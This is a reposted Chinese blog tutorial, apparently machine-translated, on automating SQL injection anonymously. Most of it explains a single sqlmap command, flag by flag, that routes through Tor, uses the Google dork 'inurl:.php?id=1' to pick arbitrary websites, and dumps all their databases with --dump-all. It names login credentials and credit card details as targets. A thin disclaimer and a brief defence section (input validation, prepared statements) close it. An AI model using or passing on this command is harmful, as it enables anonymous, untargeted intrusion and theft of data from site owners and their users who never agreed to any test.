在这篇文章中,我将向您展示如何创建并启动自动SQL注入同时保持匿名。可怕的这是多么简单,多么有效。这篇文章将有用的渗透试验器,希望简化他们的工作、节省他们时间。这篇文章还包括如何保护你的网站防止SQL注入。 免责声明:不,我真的需要这样说但无论如何. .我不负责与你违反法律的任何信息共享。这纯粹是为了教育和提高认识对于攻击者是多么容易。只有执行网站上描述的步骤,你同意这么做。 工具SQLMap提到这篇文章将为您自动执行SQL注入的盒子。所以我还将向您展示如何真正把它进一步通过自动搜索谷歌为了找到潜在的脆弱的网站。和让它使用Tor匿名。 值得说的是谷歌的使用在这种攻击称为google dorking根据谷歌的第一个结果是:…指应用先进的搜索技术的实践和专业搜索引擎参数从公司和个人发现机密信息,通常不会出现在一个正常的网络搜索,Source。 对了,我当然使用Linux,特别是Ubuntu。你可以得到Tor和SQLMap ,Windows和Mac但他们会根据系统需要安装并运行它们。 SQL注入是什么 SQL注入是一种常见的技术来窃取机密信息从一个是由数据库驱动的网站。SQL是用于查询语言关系数据库。通过注入SQL,通过网站攻击者是能够履行自己的查询数据库,因此可能是能够对数据转储,网站不想让你看到的信息(IE登录凭据和信用卡细节)。SQL注入是通过一个输入字段。这篇文章没有涉及如何手动执行SQL通过一个脆弱的网站上输入字段。 Get Tor 你可以了解Tor从这里。在Ubuntu上它可以安装使用下面的命令:
1 | sudo apt-get install -y tor |
现在确保运行以下命令:
1 | sudo service tor start |
Get SQLMap 你可以了解SQLMap从这里 一旦SQLMap完成下载,搜索SQLMap。py安装在你的机器上,确保python,这样您就可以运行它。现在他们所需要的一切的攻击者已经发动攻击。 发起攻击 下面的命令将运行SQLMap用一些基本的设置使用Tor继续攻击者匿名,也完全自动化的选择可能脆弱的网站,使其在谷歌上搜索他们。 从一个终端攻击者将执行下列(记住,这只是向您显示攻击者是多么容易,您可能不希望运行此):
1 2 3 4 | ./sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15Script Breakdown--tor |
使用Tor网络当连接到目标网站攻击
1 | --tor-type=SOCKS5 |
使用SOCKS5协议在使用Tor,那个更好比使用默认Tor匿名类型设置HTTP。
1 | -g "inurl:.php?id=1" |
谷歌码头使用网站寻找潜在的脆弱。查看这在谷歌,输入inurl:. php ?id = 1到谷歌。
1 | --random-agent |
选择一个随机的用户代理,以便它看起来像一个web浏览器访问目标网站。一些网站不会回应是否提供了一个无效的用户代理。
1 | --dump-all |
抓住所有表的所有信息。
1 | --batch |
防止SQLMap停下来,你知道怎么做。使用所有默认方式。
1 | --time-secs |
为了允许基于时间的sql注入。 攻击者将坐下来等到作为SQLMap保存多个数据库转储程序停止。 如何保护你的网站 为了确保你的网站不容易受到SQL注入你必须确保以下几点: 1.在输入字段验证所有的用户输入。 2.使用预处理语句而不是直接连接用户输入。 所以,一个非常简单而有效的攻击被防止由一个非常简单并且有效的方法。 转自:http://bobao.360.cn/learning/detail/490.html
还没有评论,来说两句吧...